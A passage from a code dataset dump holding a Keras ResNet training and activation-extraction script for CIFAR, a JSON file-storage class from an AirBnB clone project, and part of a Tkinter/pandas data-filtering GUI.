import AveragePooling2D, Input, Flatten\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom keras.datasets import cifar10, cifar100\nimport numpy as np\nimport os\nimport logging\nimport sys\nimport io\nfrom keras.utils.vis_utils import plot_model\nfrom Compression_TO import Compression_Main\nfrom Extras import RAS\n\n#https://machinelearningmastery.com\n\n#b_s = 32, epochs = 200, data_augemtation = true, num_classes = 10 (CIFAR10), substract_pixel_mean = true\ndef training_parameters(batch_size, epochs, data_augmentation, num_classes, substract_pixel_mean):\n bs = batch_size\n ep = epochs\n da = data_augmentation\n nc = num_classes\n spm = substract_pixel_mean\n #0 #1 #2 #3 #4\n return bs, ep, da, nc, spm\n\n#loads Data - need to add other data load options ( & Imagenet!)\ndef data(dataset, settings):\n num_classes = settings[3]\n subtract_pixel_mean = settings[4]\n # Load the CIFAR10 data.\n if dataset == 10:\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n if dataset == 100:\n (x_train, y_train), (x_test, y_test) = cifar100.load_data()\n\n\n # Input image dimensions.\n input_shape = x_train.shape[1:]\n\n # Normalize data.\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n\n # If subtract pixel mean is enabled\n if subtract_pixel_mean:\n x_train_mean = np.mean(x_train, axis=0)\n x_train -= x_train_mean\n x_test -= x_train_mean\n\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n print('y_train shape:', y_train.shape)\n\n # Convert class vectors to binary class matrices.\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n #0 #1 #2 #3 #4 #5 #6\n return x_train, y_train, x_test, y_test, x_train_mean, input_shape, dataset\n\n#learning rate, input the parameters function\ndef lr_schedule(epoch):\n \"\"\"Learning Rate Schedule\n\n Learning rate is scheduled to be reduced after 80, 120, 160, 180 epochs.\n Called automatically every epoch as part of callbacks during training.\n\n # Arguments\n epoch (int): The number of epochs\n\n # Returns\n lr (float32): learning rate\n \"\"\"\n\n lr = 1e-3\n if epoch > 180:\n lr *= 0.5e-3\n elif epoch > 160:\n lr *= 1e-3\n elif epoch > 120:\n lr *= 1e-2\n elif epoch > 80:\n lr *= 1e-1\n print('Learning rate: ', lr)\n return lr\n\ndef resnet_layer(inputs,\n num_filters=16,\n kernel_size=3,\n strides=1,\n activation='relu',\n batch_normalization=True,\n conv_first=True):\n \"\"\"2D Convolution-Batch Normalization-Activation stack builder\n\n # Arguments\n inputs (tensor): input tensor from input image or previous layer\n num_filters (int): Conv2D number of filters\n kernel_size (int): Conv2D square kernel dimensions\n strides (int): Conv2D square stride dimensions\n activation (string): activation name\n batch_normalization (bool): whether to include batch normalization\n conv_first (bool): conv-bn-activation (True) or\n bn-activation-conv (False)\n\n # Returns\n x (tensor): tensor as input to the next layer\n \"\"\"\n\n # Model parameter\n # ----------------------------------------------------------------------------\n # | | 200-epoch | Orig Paper| 200-epoch | Orig Paper| sec/epoch\n # Model | n | ResNet v1 | ResNet v1 | ResNet v2 | ResNet v2 | GTX1080Ti\n # |v1(v2)| %Accuracy | %Accuracy | %Accuracy | %Accuracy | v1 (v2)\n # ----------------------------------------------------------------------------\n # ResNet20 | 3 (2)| 92.16 | 91.25 | ----- | ----- | 35 (---)\n # ResNet32 | 5(NA)| 92.46 | 92.49 | NA | NA | 50 ( NA)\n # ResNet44 | 7(NA)| 92.50 | 92.83 | NA | NA | 70 ( NA)\n # ResNet56 | 9 (6)| 92.71 | 93.03 | 93.01 | NA | 90 (100)\n # ResNet110 |18(12)| 92.65 | 93.39+-.16| 93.15 | 93.63 | 165(180)\n # ResNet164 |27(18)| ----- | 94.07 | ----- | 94.54 | ---(---)\n # ResNet1001| (111)| ----- | 92.39 | ----- | 95.08+-.14| ---(---)\n # ---------------------------------------------------------------------------\n conv = Conv2D(num_filters,\n kernel_size=kernel_size,\n strides=strides,\n padding='same',\n kernel_initializer='he_normal',\n kernel_regularizer=l2(1e-4))\n\n x = inputs\n if conv_first:\n x = conv(x)\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n else:\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n x = conv(x)\n return x\n\n\ndef resnet_v1(n, data):\n \"\"\"ResNet Version 1 Model builder [a]\n\n Stacks of 2 x (3 x 3) Conv2D-BN-ReLU\n Last ReLU is after the shortcut connection.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filters is\n doubled. Within each stage, the layers have the same number filters and the\n same number of filters.\n Features maps sizes:\n stage 0: 32x32, 16\n stage 1: 16x16, 32\n stage 2: 8x8, 64\n The Number of parameters is approx the same as Table 6 of [a]:\n ResNet20 0.27M\n ResNet32 0.46M\n ResNet44 0.66M\n ResNet56 0.85M\n ResNet110 1.7M\n\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n\n # Returns\n model (Model): Keras model instance\n \"\"\"\n depth = n * 6 + 2\n input_shape = data[5]\n num_classes = data[6]\n if (depth - 2) % 6 != 0:\n raise ValueError('depth should be 6n+2 (eg 20, 32, 44 in [a])')\n\n # Start model definition.\n num_filters = 16\n num_res_blocks = int((depth - 2) / 6)\n\n inputs = Input(shape=input_shape)\n x = resnet_layer(inputs=inputs)\n # Instantiate the stack of residual units\n for stack in range(3):\n for res_block in range(num_res_blocks):\n strides = 1\n if stack > 0 and res_block == 0: # first layer but not first stack\n strides = 2 # downsample\n y = resnet_layer(inputs=x,\n num_filters=num_filters,\n strides=strides)\n y = resnet_layer(inputs=y,\n num_filters=num_filters,\n activation=None)\n if stack > 0 and res_block == 0: # first layer but not first stack\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = keras.layers.add([x, y])\n x = Activation('relu')(x)\n num_filters *= 2\n\n # Add classifier on top.\n # v1 does not use BN after last shortcut connection-ReLU\n x = AveragePooling2D(pool_size=8)(x)\n y = Flatten()(x)\n outputs = Dense(num_classes,\n activation='softmax',\n kernel_initializer='he_normal')(y)\n\n # Instantiate model.\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\n\ndef resnet_v2(n, data):\n \"\"\"ResNet Version 2 Model builder [b]\n\n Stacks of (1 x 1)-(3 x 3)-(1 x 1) BN-ReLU-Conv2D or also known as\n bottleneck layer\n First shortcut connection per layer is 1 x 1 Conv2D.\n Second and onwards shortcut connection is identity.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filter maps is\n doubled. Within each stage, the layers have the same number filters and the\n same filter map sizes.\n Features maps sizes:\n conv1 : 32x32, 16\n stage 0: 32x32, 64\n stage 1: 16x16, 128\n stage 2: 8x8, 256\n\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n\n # Returns\n model (Model): Keras model instance\n \"\"\"\n depth = n * 9 + 2\n input_shape = data[5]\n num_classes = data[6]\n if (depth - 2) % 9 != 0:\n raise ValueError('depth should be 9n+2 (eg 56 or 110 in [b])')\n\n # Start model definition.\n num_filters_in = 16\n num_res_blocks = int((depth - 2) / 9)\n\n inputs = Input(shape=input_shape)\n # v2 performs Conv2D with BN-ReLU on input before splitting into 2 paths\n x = resnet_layer(inputs=inputs,\n num_filters=num_filters_in,\n conv_first=True)\n\n # Instantiate the stack of residual units\n for stage in range(3):\n for res_block in range(num_res_blocks):\n activation = 'relu'\n batch_normalization = True\n strides = 1\n if stage == 0:\n num_filters_out = num_filters_in * 4\n if res_block == 0: # first layer and first stage\n activation = None\n batch_normalization = False\n else:\n num_filters_out = num_filters_in * 2\n if res_block == 0: # first layer but not first stage\n strides = 2 # downsample\n\n # bottleneck residual unit\n y = resnet_layer(inputs=x,\n num_filters=num_filters_in,\n kernel_size=1,\n strides=strides,\n activation=activation,\n batch_normalization=batch_normalization,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_in,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_out,\n kernel_size=1,\n conv_first=False)\n if res_block == 0:\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters_out,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = keras.layers.add([x, y])\n\n num_filters_in = num_filters_out\n\n # Add classifier on top.\n # v2 has BN-ReLU before Pooling\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = AveragePooling2D(pool_size=8)(x)\n y = Flatten()(x)\n outputs = Dense(num_classes,\n activation='softmax',\n kernel_initializer='he_normal')(y)\n\n # Instantiate model.\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\n#n = 3\ndef ResNet(version, n, data, settings):\n batch_size = settings[0]\n epochs = settings[1]\n data_augmentation = settings[2]\n x_train = data[0]\n y_train = data[1]\n x_test = data[2]\n y_test = data[3]\n x_train_mean = data[4]\n if version == 2:\n model = resnet_v2(n, data)\n depth = n * 9 + 2\n else:\n model = resnet_v1(n, data)\n depth = n * 6 + 2\n\n # Model name, depth and version\n model_type = 'ResNet%dv%d' % (depth, version)\n model.compile(loss='categorical_crossentropy',\n optimizer=Adam(learning_rate=lr_schedule(0)),\n metrics=['accuracy'])\n model.summary()\n print(model_type)\n # number of layers\n number_of_layers = model.layers\n print('The number of layers is:', len(number_of_layers))\n\n # --------------------------------------------------------------------------------\n # Get Output Activations\n num_layers = len(number_of_layers)\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n #print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n # ---------------------------------------------------------------------------------\n\n # Prepare model model saving directory.\n save_dir = os.path.join(os.getcwd(), 'saved_models')\n model_name = 'cifar10_%s_model.{epoch:03d}.h5' % model_type\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n filepath = os.path.join(save_dir, model_name)\n print('filepath', filepath)\n\n # Prepare callbacks for model saving and for learning rate adjustment.\n checkpoint = ModelCheckpoint(filepath=filepath,\n monitor='val_acc',\n verbose=1,\n save_best_only=True)\n\n lr_scheduler = LearningRateScheduler(lr_schedule)\n\n lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),\n cooldown=0,\n patience=5,\n min_lr=0.5e-6)\n\n callbacks = [checkpoint, lr_reducer, lr_scheduler]\n\n # Run training, with or without data augmentation.\n if not data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True,\n callbacks=callbacks)\n else:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n # set input mean to 0 over the dataset\n featurewise_center=False,\n # set each sample mean to 0\n samplewise_center=False,\n # divide inputs by std of dataset\n featurewise_std_normalization=False,\n # divide each input by its std\n samplewise_std_normalization=False,\n # apply ZCA whitening\n zca_whitening=False,\n # epsilon for ZCA whitening\n zca_epsilon=1e-06,\n # randomly rotate images in the range (deg 0 to 180)\n rotation_range=0,\n # randomly shift images horizontally\n width_shift_range=0.1,\n # randomly shift images vertically\n height_shift_range=0.1,\n # set range for random shear\n shear_range=0.,\n # set range for random zoom\n zoom_range=0.,\n # set range for random channel shifts\n channel_shift_range=0.,\n # set mode for filling points outside the input boundaries\n fill_mode='nearest',\n # value used for fill_mode = \"constant\"\n cval=0.,\n # randomly flip images\n horizontal_flip=True,\n # randomly flip images\n vertical_flip=False,\n # set rescaling factor (applied before any other transformation)\n rescale=None,\n # set function that will be applied on each input\n preprocessing_function=None,\n # image data format, either \"channels_first\" or \"channels_last\"\n data_format=None,\n # fraction of images reserved for validation (strictly between 0 and 1)\n validation_split=0.0)\n\n # Compute quantities required for featurewise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(x_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n epochs=epochs, verbose=1, workers=4,\n callbacks=callbacks)\n\n # Score trained model.\n scores = model.evaluate(x_test, y_test, verbose=1)\n print('Test loss:', scores[0])\n print('Test accuracy:', scores[1])\n #plot = plot_model(model)\n #see if install jupyter notebook to get image of plot.\n model.save(\"resnetv2_model.h5\")\n return model\n\n\ndef activations_compression(model, data, settings):\n # Get Output Activations\n x_test = data[2]\n batch_size = settings[0]\n number_of_layers = model.layers\n print('number of layers:', len(number_of_layers))\n num_layers = len(number_of_layers)\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n #print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n\n data = x_test\n num_batches = data.shape[0] // batch_size\n for batch_idx in range(num_batches):\n start = batch_idx * batch_size\n end = start + batch_size\n intermediate_output = intermediate_layer_model.predict(data[start:end])\n #print(\"Intermediate result batch {}/{} done\".format(batch_idx, num_batches))\n\n # loop to measure size of each layer, compresses it with all the compression algorithms and saves the ratios as well\n for i in range(len(intermediate_output)):\n #adjust to save matrizes - which type of file and how?\n #with io.open(\"ResNetv2_activations_of_layer_\" + str(i + 1) + \".txt\", 'w', encoding='utf-8') as f:\n #f.write(str(intermediate_output[i]))\n #number of entries in matrix:\n num_entries = len(intermediate_output[i].flatten())\n print('number of entries of', i+1, 'layer is:', num_entries)\n #size of matrix in KB\n size_entries = RAS.get_obj_size(intermediate_output[i])\n print('size of entries of', i+1, 'layer is: ', size_entries, 'KB')\n #compress with all the algorithms (try with huffman then add others)\n compression = Compression_Main.compress_all(intermediate_output[i])\n #print(i + 1, 'th layer activations', intermediate_output[i])\n i += 1\n return\n\n\n#save the activation & weight matrizes from each individual layer as well as the global matrix\n#try epoch later maybe\ndef activations_weights(model, data, settings, modelname):\n #get weights of each layer\n\n #w_d = dict()\n #for layer in model.layers:\n # print(layer.get_config(), layer.get_weights())\n # layer_[layer]_weights = layer.get_weights(layer)\n #get global weights\n '''\n####weights\n# weight_dict = {}\n global_weights = model.get_weights()\n print('Global weights matrix:', global_weights)\n np.save(modelname+'global_weights', global_weights)\n\n for layer_i in range(0,len(model.layers)-1):\n w = model.layers[layer_i].get_weights()[0]\n #saves weights as np.arrays to acording file\n np.save(modelname+'_weights_'+str(layer_i+1), w)\n print('Layer %s has weights of shape %s ' % (layer_i, np.shape(w)))\n##############################################################\n # save all weights and biases inside a dictionary\n if epoch == 0:\n # create array to hold weights\n weight_dict['w_' + str(layer_i + 1)] = w\n\n else:\n # append new weights to previously-created weights array\n weight_dict['w_' + str(layer_i + 1)] = np.dstack(\n (weight_dict['w_' + str(layer_i + 1)], w))\n print('weights dictionary:', weight_dict)\n '''\n####activations\n# Get Output Activations\n x_test = data[2]\n batch_size = settings[0]\n number_of_layers = model.layers\n num_layers = len(number_of_layers)\n print('number of layers:', len(number_of_layers))\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n #print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n\n data = x_test\n num_batches = data.shape[0] // batch_size\n for batch_idx in range(num_batches):\n start = batch_idx * batch_size\n end = start + batch_size\n intermediate_output = intermediate_layer_model.predict(data[start:end])\n #print(\"Intermediate result batch {}/{} done\".format(batch_idx, num_batches))\n\n #check this and change https://careerkarma.com/blog/python-typeerror-list-object-is-not-callable/#:~:text=Conclusion-,The%20Python%20%E2%80%9Ctypeerror%3A%20'list'%20object%20is%20not%20callable,list%20rather%20than%20curly%20brackets.\n #global_activations = intermediate_output\n #print('Global activations matrix:', global_activations)\n #np.save(modelname + 'global_activations', global_activations)\n global_a = intermediate_output[0].flatten()\n print('length of activations layers:', len(intermediate_output))\n for i in range(len(intermediate_output)):\n a = intermediate_output[i]\n # save activations as np.arrays to according file\n np.save(modelname + '_activations_' + str(i + 1), a)\n if i > 0:\n a_g = a.flatten()\n global_a = np.concatenate((global_a, a_g), axis = 0)\n np.save(modelname + 'global_activations', global_a)\n\n ######################################\n #weights\n #tf.keras.layers.Layer.get_weights()\n global_weights = model.get_weights()\n #print('Global weights matrix:', global_weights)\n np.save(modelname + 'global_weights', global_weights)\n\n '''\n i = 1\n for layer in model.layers:\n weights = layer.get_weights()\n print('weights'+ str(i) , weights)\n i += 1\n '''\n #https://ai-pool.com/d/how-to-get-the-weights-of-keras-model- to check loope\n i = 1\n for layer in model.layers:\n #print('i is: ', i)\n w = layer.get_weights()\n #print('weights'+ str(i) , weights)\n #w = model.get_layer(index=i).get_weights()[0]\n #w = model.get_layers[i].get_weights()[0]\n #w = model.layers[i].get_weights()[0]\n # saves weights as np.arrays to acording file\n np.save(modelname + '_weights_' + str(i), w)\n print('Layer %s has weights of shape %s ' % (i, np.shape(w)))\n i += 1\n\n\n\n#################################################################\nsettings = training_parameters(32, 1, True, 10, True)\ndata = data(10, settings)\n#resnet2 = ResNet(2, 3, data, settings)\nloaded_model = load_model(\"resnetv2_model.h5\")\n#compression = activations_compression(resnet2, data, settings)\n#activations_weights(resnet2, data, settings, \"ResNetv2\")\nactivations_weights(loaded_model, data, settings, \"ResNetv2\")\n","repo_name":"M2theJJ/NN","sub_path":"NN_TO/Backup.py","file_name":"Backup.py","file_ext":"py","file_size_in_byte":24627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"24870393445","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage file storage for hbnb clone\"\"\"\nimport json\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass FileStorage:\n \"\"\"This class manages storage of hbnb models in JSON format\"\"\"\n __file_path = 'file.json'\n __objects = {}\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n if cls is not None:\n # If cls is provided as a string, convert it to a class object\n if type(cls) == str:\n cls = eval(cls)\n my_dict = {}\n # Iterate through the items in the __objects dictionary\n for key, value in self.__objects.items():\n # Check if the type of the value\n # matches the provided class (cls)\n if type(value) == cls:\n # If it matches, add it to the my_dict dictionary\n my_dict[key] = value\n # Return the filtered dictionary\n # containing instances of the provided class\n return my_dict\n return self.__objects\n\n def new(self, obj):\n \"\"\"Adds new object to storage dictionary\"\"\"\n class_name = obj.to_dict().get('__class__')\n obj_id = obj.to_dict().get('id')\n\n if class_name is None:\n print(f\"Error: '__class__' is None for object {obj}\")\n return\n\n if obj_id is None:\n print(f\"Error: 'id' is None for object {obj}\")\n return\n\n key = f\"{class_name}.{obj_id}\"\n self.all().update({key: obj})\n\n def save(self):\n \"\"\"Saves storage dictionary to file\"\"\"\n with open(FileStorage.__file_path, 'w') as f:\n temp = {}\n temp.update(FileStorage.__objects)\n for key, val in temp.items():\n temp[key] = val.to_dict()\n json.dump(temp, f)\n\n def reload(self):\n \"\"\"Loads storage dictionary from file\"\"\"\n\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n try:\n temp = {}\n with open(FileStorage.__file_path, 'r') as f:\n temp = json.load(f)\n for key, val in temp.items():\n self.all()[key] = classes[val['__class__']](**val)\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n \"\"\"It Deletes the object from __objects\"\"\"\n if obj is not None:\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n if key in self.__objects:\n del self.__objects[key]\n\n def close(self):\n \"\"\"Deserializing\n the JSON file to objects\n \"\"\"\n self.reload()\n","repo_name":"AmalNadifi/AirBnB_clone_v2","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"13270212376","text":"import math\r\nimport tkinter as tk\r\nfrom itertools import cycle\r\nfrom tkinter import ttk\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import gridspec\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom dfextractions import df_extractions\r\nfrom dfgc import df_gc, df_gc_stat\r\nfrom dfhplc import df_hplc_results\r\nfrom dfsamples import df_samples\r\n\r\nmatplotlib.use('TkAgg')\r\n\r\n\r\nclass Dataset:\r\n dataframes = {}\r\n cat_columns = {}\r\n num_columns = {}\r\n\r\n @staticmethod\r\n def set_df(name, df):\r\n Dataset.num_columns[name] = list(df.select_dtypes(include=[np.number]).columns.values)\r\n Dataset.cat_columns[name] = list(df.select_dtypes(exclude=[np.number]).columns.values)\r\n Dataset.dataframes[name] = df\r\n\r\n def __init__(self):\r\n df_extractions_raw = df_extractions\r\n self.set_df('Extraktionen', df_extractions_raw)\r\n\r\n df_samples_raw = df_samples\r\n self.set_df('Analytikproben', df_samples_raw)\r\n\r\n df_gc_results_raw = df_gc\r\n self.set_df('GC Ergebnisse', df_gc_results_raw)\r\n\r\n df_gc_results = df_gc_stat\r\n self.set_df('GC Ergebnisse (Stat)', df_gc_results)\r\n\r\n df_hplc_results_raw = df_hplc_results\r\n self.set_df('HPLC Ergebnisse', df_hplc_results_raw)\r\n\r\n @staticmethod\r\n def get_columns(*args, **kwargs):\r\n dfs = {}\r\n for arg in args:\r\n if arg is None:\r\n continue\r\n df, col = arg.split(': ')\r\n if df in dfs.keys():\r\n dfs[df].append(col)\r\n else:\r\n dfs[df] = ['Inhalt', 'Versuch', col]\r\n prefilter = {'ex': {}, 'in': {}}\r\n if \"filter\" in kwargs.keys():\r\n incl, excl = kwargs['filter'].get_rule()\r\n for key, vals in incl.items():\r\n df, col = key.split(': ')\r\n if df in prefilter['in'].keys():\r\n prefilter['in'][df][col] = vals\r\n else:\r\n prefilter['in'][df] = {col: vals}\r\n for key, vals in excl.items():\r\n df, col = key.split(': ')\r\n if df in prefilter['ex'].keys():\r\n prefilter['ex'][df][col] = vals\r\n else:\r\n prefilter['ex'][df] = {col: vals}\r\n dfs = sorted(dfs.items(), key=lambda item: Dataset.dataframes[item[0]].shape[0], reverse=True)\r\n ret = Dataset.dataframes[dfs[0][0]]\r\n if dfs[0][0] in prefilter['in'].keys():\r\n for col, vals in prefilter['in'][dfs[0][0]]:\r\n ret = ret[ret[col].isin(vals)]\r\n prefilter['in'].pop(dfs[0][0], None)\r\n elif dfs[0][0] in prefilter['ex'].keys():\r\n for col, vals in prefilter['ex'][dfs[0][0]]:\r\n ret = ret[~ret[col].isin(vals)]\r\n prefilter['ex'].pop(dfs[0][0], None)\r\n ret = ret[dfs[0][1]].dropna().set_index(['Versuch', 'Inhalt'])\r\n ret.columns = [f\"{dfs[0][0]}: {col}\" for col in ret.columns]\r\n for df, cols in dfs[1:]:\r\n tmp = Dataset.dataframes[df]\r\n if df in prefilter['in'].keys():\r\n for col, vals in prefilter['in'][df].items():\r\n tmp = tmp[tmp[col].isin(vals)]\r\n prefilter['in'].pop(df, None)\r\n if df in prefilter['ex'].keys():\r\n for col, vals in prefilter['ex'][df].items():\r\n tmp = tmp[~tmp[col].isin(vals)]\r\n prefilter['ex'].pop(df, None)\r\n tmp = tmp[cols].dropna().set_index(['Versuch', 'Inhalt'])\r\n tmp.columns = [f\"{df}: {cl}\" for cl in tmp.columns]\r\n ret = ret.merge(tmp, left_index=True, right_index=True)\r\n ret = ret.reset_index()\r\n for df, info in prefilter['in'].items():\r\n tmp = Dataset.dataframes[df]\r\n for col, values in info.items():\r\n tmp = tmp[tmp[col].isin(values)]\r\n ret = tmp[['Versuch', 'Inhalt']].merge(ret, left_on=['Versuch', 'Inhalt'], right_on=['Versuch', 'Inhalt'])\r\n for df, info in prefilter['ex'].items():\r\n tmp = Dataset.dataframes[df]\r\n for col, values in info.items():\r\n tmp = tmp[~tmp[col].isin(values)]\r\n ret = tmp[['Versuch', 'Inhalt']].merge(ret, left_on=['Versuch', 'Inhalt'], right_on=['Versuch', 'Inhalt'])\r\n with pd.option_context('display.max_rows', None, 'display.max_columns', None, \"display.width\", 400):\r\n print(ret)\r\n ret = [ret[arg] if arg is not None else None for arg in list(args) + ['Versuch', 'Inhalt']]\r\n return ret\r\n\r\n @staticmethod\r\n def dict_o_lists_to_str(dict):\r\n acc = []\r\n for dataframe, columns in dict.items():\r\n for column in columns:\r\n acc.append(f\"{dataframe}: {column}\")\r\n return acc\r\n\r\n @staticmethod\r\n def get_numerical_columns():\r\n return Dataset.dict_o_lists_to_str(Dataset.num_columns)\r\n\r\n @staticmethod\r\n def get_categorical_columns():\r\n return Dataset.dict_o_lists_to_str(Dataset.cat_columns)\r\n\r\n\r\nclass Series:\r\n def __init__(self, title, master):\r\n self.master = master\r\n self.title = title\r\n self.row = 1\r\n self.frame = None\r\n self.button = None\r\n self.include = {}\r\n self.exclude = {}\r\n\r\n def get_rule(self):\r\n acc = {}\r\n exc = {}\r\n for flt in self.include.values():\r\n if flt[0] in acc.keys():\r\n acc[flt[0]].append(flt[1])\r\n else:\r\n acc[flt[0]] = [flt[1]]\r\n for flt in self.exclude.values():\r\n if flt[0] in exc.keys():\r\n exc[flt[0]].append(flt[1])\r\n else:\r\n exc[flt[0]] = [flt[1]]\r\n return acc, exc\r\n\r\n def set_filter(self, cb1, cb2, cb3):\r\n row = cb1.grid_info()['row']\r\n\r\n self.include.pop(row, None)\r\n self.exclude.pop(row, None)\r\n\r\n incl = cb1.get()\r\n dfcol = cb2.get()\r\n value = cb3.get()\r\n if len(incl) > 0 and len(dfcol) > 0 and len(value) > 0:\r\n if incl == 'inklusive':\r\n self.include[row] = (dfcol, value)\r\n elif incl == 'exklusive':\r\n self.exclude[row] = (dfcol, value)\r\n self.master.update()\r\n\r\n def load_options(self, event, cb1, cb2, cb3):\r\n df, col = event.widget.get().split(': ')\r\n cb3.set('')\r\n cb3.configure(values=list(Dataset.dataframes[df][col].unique()))\r\n self.set_filter(cb1, cb2, cb3)\r\n\r\n def __add_btn(self, frame, row):\r\n self.__add_filter(frame, row)\r\n self.row += 1\r\n\r\n def __add_filter(self, frame, row, include=None, dfcol=None, val=None):\r\n tk.Label(frame, text='Filter: ').grid(column=0, row=row, sticky='W')\r\n cb1 = ttk.Combobox(frame, values=['inklusive', 'exklusive', 'inaktiv'], width=8)\r\n cb1.grid(column=1, row=row)\r\n if include:\r\n cb1.set(include)\r\n cb3 = ttk.Combobox(frame, values=[], width=18)\r\n if val:\r\n cb3.set(val)\r\n cb3.grid(column=3, row=row)\r\n cb2 = ttk.Combobox(frame, values=Dataset.get_categorical_columns(), width=35)\r\n if dfcol:\r\n cb2.set(dfcol)\r\n df, col = dfcol.split(': ')\r\n cb3.configure(values=list(Dataset.dataframes[df][col].unique()))\r\n cb2.bind('<>', lambda event: self.load_options(event, cb1, cb2, cb3))\r\n cb2.grid(column=2, row=row)\r\n cb1.bind('<>', lambda event: self.set_filter(cb1, cb2, cb3))\r\n cb3.bind('<>', lambda event: self.set_filter(cb1, cb2, cb3))\r\n self.button.grid(column=0, row=self.row + 1, columnspan=4)\r\n\r\n def apply_gui(self, frame):\r\n self.frame = frame\r\n self.button = tk.Button(self.frame, width=50, text=\"+\", command=lambda: self.__add_btn(self.frame, self.row))\r\n for i in range(self.row):\r\n if i in self.exclude.keys():\r\n dfcol, val = self.exclude[i]\r\n self.__add_filter(self.frame, i, 'exklusive', dfcol, val)\r\n elif i in self.include.keys():\r\n dfcol, val = self.include[i]\r\n self.__add_filter(self.frame, i, 'inklusive', dfcol, val)\r\n else:\r\n self.__add_filter(self.frame, i)\r\n\r\n\r\nclass SeriesManager:\r\n def __cb(self, exp):\r\n exp.destroy()\r\n self.is_open = False\r\n\r\n def __init__(self, master):\r\n self.master = master\r\n self.series = []\r\n self.options = Dataset.get_categorical_columns()\r\n self.is_open = False\r\n\r\n def add(self, title, tab_ctrl, is_new=True):\r\n tab1 = ttk.Frame(tab_ctrl)\r\n if is_new:\r\n if len(title) == 0:\r\n title = f\"Reihe {len(self.series)}\"\r\n self.series.append(Series(title, self.master))\r\n self.series[-1].apply_gui(tab1)\r\n else:\r\n title.apply_gui(tab1)\r\n title = title.title\r\n tab_ctrl.add(tab1, text=title)\r\n\r\n def open(self):\r\n if self.is_open:\r\n return\r\n exp = tk.Toplevel(self.master)\r\n exp.title(f\"Reihenmanager {self.master.title}\")\r\n exp.protocol(\"WM_DELETE_WINDOW\", lambda: self.__cb(exp))\r\n exp.geometry(\"500x200\")\r\n tab_ctrl = 